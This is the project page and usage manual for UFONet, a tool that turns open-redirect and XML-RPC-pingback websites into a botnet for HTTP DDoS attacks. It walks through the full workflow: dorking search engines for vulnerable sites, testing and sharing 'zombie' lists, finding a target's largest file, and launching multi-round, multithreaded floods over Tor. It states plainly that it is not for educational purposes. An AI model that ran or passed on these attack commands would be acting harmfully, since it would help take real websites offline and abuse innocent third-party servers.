UFONet - DDoS Botnet via Web Abuse 
"oderint dum metuant"



Up to menu
UFONet - is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet. + See this links for more info: - CWE-601:Open Redirect - OWASP:URL Redirector Abuse UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

[!]Remember: this tool is NOT for educational purpose.

UFONet Blazar!
Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.


Up to menu
+ Source code (official):

git clone https://github.com/epsylon/ufonet

-------------------------------- + Packages (latest version!): - UFONet-v0.9 (.zip) (md5:7540f45eb8e2d3881f8d17e9a638987a) - torrent - UFONet-v0.9 (.tar.gz) (md5:2885a332afecea3d730361557a84a9ca) - torrent -------------------------------- + Previous (old versions): - UFONet-v0.8 (.zip) (md5:da3f21a040ff5089f86f9d6f83c65138) - torrent - UFONet-v0.8 (.tar.gz) (md5:43c282660fde63a0c287e2c3a3260f76) - torrent - UFONet-v0.7 (.zip) (md5:77af04023893d71f34e12a424247a0dd) - torrent - UFONet-v0.7 (.tar.gz) (md5:5f4656a8e0a75a8483c3d425e86cca4b) - torrent - UFONet-v0.6 (.zip) (md5:f6be802f76e40b7dfd06075bfc616e39) - torrent - UFONet-v0.6 (.tar.gz) (md5:40ca8242475a72dc99c139309fe9055c) - torrent - UFONet-v0.5b (.tar.gz) (md5:775f13baefb9241142c377f8519506f7)


Up to menu
If you have problems with UFONet, try to solve them following next links: - Website FAQ section - UFONet GitHub issues
Also you can stay in touch by reporting on my "mothership" (Board provided by default) [ +Zoom ].
If nobody gets back to you, then drop me an e-mail.


Up to menu
UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries: python-pycurl - Python bindings to libcurl python-geoip - Python bindings for the GeoIP IP-to-country resolver library python-whois - Python module for retrieving WHOIS information - Python 2 python-crypto - Cryptographic algorithms and protocols for Python python-requests - elegant and simple HTTP library for Python2, built for human beings On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl python-geoip python-whois python-crypto python-requests On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run: pip install geoip pip install requests pip install pycrypto Source libs: * Python: https://www.python.org/downloads/ * PyCurl: http://pycurl.sourceforge.net/ * PyGeoIP: https://pypi.python.org/pypi/GeoIP/ * PyWhois: https://pypi.python.org/pypi/whois * PyCrypto: https://pypi.python.org/pypi/pycrypto * PyRequests: https://pypi.python.org/pypi/requests


Up to menu
Usage: ./ufonet [options] Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --update check for latest stable version --check-tor check to see if Tor is used properly --force-yes set 'YES' to all questions --gui run GUI (UFONet Web Interface) *Tools*: --crypter Encrypt/Decrypt messages using AES256+HMAC-SHA1 *Configure Request(s)*: --proxy=PROXY Use proxy server (tor: '') --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default SPOOFED) --host=HOST Use another HTTP Host header (default NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default 10) --retries=RETRIES Retries when the connection timeouts (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 5) --delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default 10) --se=ENGINE Search engine to use for 'dorking' (default bing) --sa Search massively using all search engines --auto-search Search automatically for 'zombies' (may take time!) *Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt') --attack-me Order 'zombies' to attack you (NAT required!) --test-rpc Update 'xml-rpc' reflectors status *Community*: --download-zombies Download 'zombies' from Community server --upload-zombies Upload your 'zombies' to Community server --blackhole Create a 'blackhole' to share your 'zombies' --up-to=UPIP Upload your 'zombies' to a 'blackhole' --down-from=DIP Download your 'zombies' from a 'blackhole' *Research Target*: -i INSPECT Search biggest file (ex: -i 'http(s)://target.com') -x ABDUCTION Examine webserver configuration (+CVE info) *Extra Attack(s)*: --db=DBSTRESS Set db stress input point (ex: --db 'search.php?q=') --loic=LOIC Start 'DoS' Web LOIC attack (ex: --loic 100) *Configure Attack(s)*: --no-head Disable status check: 'Is target up?' --no-aliens Disable 'aliens' web abuse --no-droids Disable 'droids' redirectors --no-ucavs Disable 'ucavs' checkers --no-rpcs Disable 'xml-rpcs' reflectors -r ROUNDS Set number of rounds (default 1) -b PLACE Set place to attack (ex: -b '/path/big.jpg') -a TARGET Start 'DDoS' attack (ex: -a 'http(s)://target.com')


Up to menu
  • Searching for 'zombies':

  UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites. 
  A common query string should be like this:


  For example you can begin a search with:

       ./ufonet -s 'proxy.php?url='

  Or providing a list of "dorks" from a file:

       ./ufonet --sd 'botnet/dorks.txt'

  By default UFONet will uses a search engine called 'bing'. But you can choose a different one:

       ./ufonet -s 'proxy.php?url=' --se 'bing'

  This is the list of available search engines with last time that were working:

        - bing [14/07/2017: OK!]
        - yahoo [14/07/2017: OK!]
        - yandex [14/07/2017: OK!]

  You can also search massively using all search engines supported:

       ./ufonet -s 'proxy.php?url=' --sa 

  To control how many 'zombies' recieve from search engines you can use:

       ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20

  Or you can make the tool to search automatically for the max number of results (this may take time!))

       ./ufonet --auto-search

  At the end of the process, you will be asked if you want to check the list retrieved to see 
  if the urls are vulnerable.

       Wanna check if they are valid zombies? (Y/n)

  Also, you will be asked to update the list adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y' your new 'zombies' will be appended to the file named: zombies.txt


     + with verbose:     ./ufonet -s 'proxy.php?url=' -v
     + with threads:     ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100

  • Testing botnet:

  Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. 
  Urls of the 'zombies' should be like this:


  After that, launch it:

       ./ufonet -t 'botnet/zombies.txt'

  You can order to 'zombies' to attack you and see how they reply to your needs using:

       ./ufonet --attack-me 

  At the end of the process you will be asked if you want to update the list 
  adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y', your file: zombies.txt will be updated.


     + with verbose:     ./ufonet -t 'botnet/zombies.txt' -v
     + with proxy TOR:   ./ufonet -t 'botnet/zombies.txt' --proxy=""
     + with threads:     ./ufonet -t 'botnet/zombies.txt' --threads 50

  • Inspecting a target:

  This feature will provides you the biggest file on target:

       ./ufonet -i http://target.com

  You can use this when attacking to be more effective:

       ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"



       ./ufonet -i http://target.com



        +Image found: images/wizard.jpg
	(Size: 63798 Bytes)
	+Style (.css) found: fonts.css
	(Size: 20448 Bytes)
	+Webpage (.php) found: contact.php
	(Size: 2483 Bytes)
	+Webpage (.php) found: about.php
	(Size: 1945 Bytes)
	+Webpage (.php) found: license.php
	(Size: 1996 Bytes)
	=Biggest File: http://target.com/images/wizard.jpg

Also you can obtain information about web server configuration from your target using:

       ./ufonet -x http://target.com

  • Attacking a target:

  Enter a target to attack with a number of rounds:

       ./ufonet -a http://target.com -r 10

  On this example UFONet will attacks the target a number of 10 times for each 'zombie'. That means that 
  if you have a list of 1.000 'zombies' it will launchs 1.000 'zombies' x 10 rounds = 10.000 requests 
  to the target.

  By default if you don't put any round it will apply only 1.

  Additionally, you can choose a place to recharge on target's site. For example, a large image, 
  a big size file or a flash movie. In some scenarios where targets doesn't use cache systems 
  this will do the attack more effective.

       ./ufonet -a http://target.com -b "/images/big_size_image.jpg"


     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy=""
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500

  • Special attacks:

  UFONet uses different ways to exploit 'Open Redirect' vulnerabilities. For example:

  You can use UFONet to stress database on target by requesting random valid strings like search queries:

     ./ufonet -a http://target.com --db "search.php?q="

  Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing 
  processing required by target.

  You can test your list of 'X-RPCs zombies' by launching:

     ./ufonet --test-rpc

  At same time, you can connect a LOIC (with proxy support), to make a determinate number of recursive requests 
  directly to your target:

     ./ufonet -a http://target.com --loic 100

  • Updating:

  UFONet implements an option to update the tool to the latest stable version.
  This feature can be used only if you have cloned it from GitHub repository.

  To check your version you should launch:

       ./ufonet --update

  This will update the tool automatically, removing all files from your old package.

  • Generating 'Blackhole':

  UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
  * Setup web server with a folder "ufonet", this folder should be: 

    - located in /var/www/ufonet (default debian/ubuntu install)
    - owned by the user running the blackhole
    - accessible with http://your-ip/ufonet/

  * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)

  * Anyone wanting to connect to your server needs to set the --up-to/--down-from 
    to the ip address of your webserver...

  [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.


   + Starting 'blackhole' server: ./ufonet --blackhole




Up to menu
You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience. To launch it, use: ./ufonet --gui This will open a tab on your default browser with all features of the tool and some 'extra' options:
Allows to read last 'news' published by a "mothership"
Allows to read last 'missions' published by a "mothership"
Allows to review statistics from your "spaceship"
Allows to send/receive messages to/from a "mothership" (a forum)
Allows to interact with a "mothership" to download/upload 'zombies'
Allows to review statistics from other "spaceships"


Up to menu
* Shell: Banner [ +Zoom ]

UFONet Big Crunch!
* Shell: Tango Down! [ +Zoom ]

UFONet Big Crunch!
* GUI: Banner [ +Zoom ]

UFONet Big Crunch!
* GUI: Welcome Visor [ +Zoom ]

UFONet Blazar!
* GUI: Attack Visor [ +Zoom ]

UFONet Blazar!
* GUI: Stats [ +Zoom ]

UFONet Blazar!
* GUI: Board [ +Zoom ]

UFONet Blazar!
* GUI: Grid [ +Zoom ]

UFONet Blazar!
* GUI: GlobalMap Deploying Botnet [ +Zoom ]

UFONet Big Crunch!
* GUI: GlobalMap Botnet Attack [ +Zoom ]

UFONet Big Crunch!
* VIDEO: UFONet v0.7 "Big Crunch!" (OLD VersioN!)
* VIDEO: UFONet v0.6 "Galactic OFFensive" (OLD version!)


Up to menu
UFONet is released under the terms of the GPLv3 and is copyrighted by psy.


Up to menu
To make donations use the following hash: - Bitcoin: 1Q63KtiLGzXiYA8XkWFPnWo7nKPWFr3nrc